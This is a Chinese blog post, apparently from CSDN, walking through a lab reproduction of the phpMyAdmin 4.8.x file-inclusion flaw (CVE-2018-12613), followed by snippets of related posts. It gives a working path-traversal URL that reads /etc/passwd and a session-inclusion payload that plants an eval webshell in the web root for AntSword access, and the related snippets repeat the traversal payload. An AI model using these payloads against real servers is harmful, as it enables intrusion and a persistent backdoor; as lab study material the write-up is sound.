CVE-2018-12613 文件包含漏洞 复现

于 2023-09-27 18:13:21 发布
阅读量176 收藏 1
点赞数
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41567985/article/details/133360463
版权

环境:

靶机:

系统:centos 7-vulhub

Ip: 192.168.21.32

Kali机:

    系统:Win 10

    Ip:192.168.21.21

漏洞介绍:

在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。 [‘ServerDefault’] = 0“的情况(绕过登录要求,并在没有任何身份验证的情况下运行易受攻击的代码)。

影响版本: phpMyAdmin 4.8.0和4.8.1

端口方面:vulhub 8080->80

启动vulhub环境:

    主页:

过程:

  1. 查看是否显示/etc/passwd 内的数据,若存在则具有此漏洞

http://192.168.21.32:8080/index.php?target=sql.php?/../../../../../../../../../etc/passwd

  1. 根据session写入<?php phpinfo();?>

---->

  1. F12 -存储-session名-并先复制下来

3d7330e4fce217359391def5a62be0f5

  1. 进入到靶场/tmp 查看是否一样

Docker exec -it 容器名 /bin/bash

  1. 再使用vim或cat 查看该文件内容,select 的 <?php phpinfo();?>是否成功写入

成功写入

  1. 再利用第一步的文件包含去访问该文件

可以看到更多的信息了

  1. 再利用我们看到的信息

比如网站根目录

  1. 继续利用session方式写入创建webshell的代码

select "<?php file_put_contents('/var/www/html/_PowerShell.php','<?php @eval($_POST[_PowerShell]);?>')?>"

  1. 查看session并用文件包含漏洞执行这个创建webshell代码

|

|

可以看到我们已经创建好了

这里要说明一个php函数

File_put_contents(‘file’,’content’)

如果file不存在则会创建该文件,并且把content写入到file中

  1. 试着访问_Powershell.php

  1. 试着用蚁剑连接一下,密码_PowerShell

  1. 之后便可以进行进一步的渗透了!!

防御: 升级php版本

总结一下: 通过这个漏洞的复现,我了解到了session的一些作用,原来在sql功能点使用select “code”执行的code会被存储在session中,但貌似也只存在于4.8.0 和 4.8.1这两个版本中

TYR2
关注
漏洞复现学习手册
谢公子的博客
08-09 4127
JAVA反序列化漏洞复现 OpenSSH命令注入漏洞复现(CVE-2020-15778) F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902) DNS Server远程代码执行漏洞复现(CVE-2020-1350) CVE-2020-0688漏洞复现 CVE-2019-1040域内漏洞提权复现 CVE-2020-0796(SMBv3远程代码执行)漏洞复现 通达OA低版本文件上传+apache解析漏洞getshell 通达OA命令执行漏洞复现(文件上传+文件包含)
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 705
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
CVE-2018-12613(远程文件包含)
weixin_59872639的博客
03-01 261
受影响版本 phpMyAdmin 4.8.0和4.8.1 环境 Vulhub - Docker-Compose file for vulnerability environment 漏洞利用 ?target=db_sql.php%253f/../../../../../../../../etc/passwd 因为`%253f`二次url解码后是`?`,整体变成 ?target=db_sql.php?/../../../../../../../../etc/passwd ...
CVE-2018-12613复现
0xdawn的博客
01-31 4654
0x00 漏洞描述 ​ 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ ...
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2612
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
漏洞复现CVE2018-12613
最新发布
2301_77565393的博客
06-30 88
机,并在phpMyAdmin上执⾏任意代码)外,攻击者还必须经过身份验证。在4.8.2之前的phpMyAdmin 4.8.x中发现了⼀个问题,攻击者可以在其中包含(查看并可能执⾏)服务。该漏洞来⾃⻚⾯重定向和在phpMyAdmin中加载的部分代码,以及对列⼊⽩名单的⻚⾯的。我们进⼊docker容器中,查看web服务器下的tmp⽂件,查看我们的session。况(绕过登录要求,并在没有任何身份验证的情况下运⾏易受攻击的代码)。cat查看session⽂件可以看到我们刚才查询的php代码。
phpmyadmin文件包含漏洞复现CVE-2018-12613
feng的博客
05-04 1169
前言 一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地复现过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后复现一波,看一下代码的问题。 复现 漏洞出现在index.php的第61行: 存在任意文件包含,但是需要进入if才可以。 一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中: $target_blacklist = array ( 'import.php'
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 650
漏洞
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
漏洞复现CVE-2018-12613 phpMyAdmin文件包含getshell
Mr_atopos的博客
05-22 471
漏洞影响phpMyAdmin 4.8.0-4.8.1版本 checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测 payload 通过查询在session中添加php语句,再通过文件包含执行 ?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件) target有白名单检测机制,db_sql.php在白名单中 通过?的二次编码成%253f target在检测白名单的时候,会对db_sql.php%253f进行二次u
复现PHPMyAdmin(CVE-2018-12613漏洞,并利用漏洞实现上传WebShell
qq_54713392的博客
04-20 655
复现PHPMyAdmin(CVE-2018-12613漏洞 并利用漏洞实现上传WebShell 漏洞描述:   在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 768
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 998
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
漏洞复现CVE-2018-12613
Amire0x的小乐园
09-14 696
phpmyadmin(CVE-2018-12613) 影响版本 phpMyAdmin 4.8.0-4.8.1版本 分析 $target_blacklist = array ( 'import.php', 'export.php' ); //可以看到,要达到文件包含的目的,需要满足5个条件 if (! empty($_REQUEST['target'])//非空 && is_string($_REQUEST['target'])//必须是字符串 &&
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 2023
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 5301
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值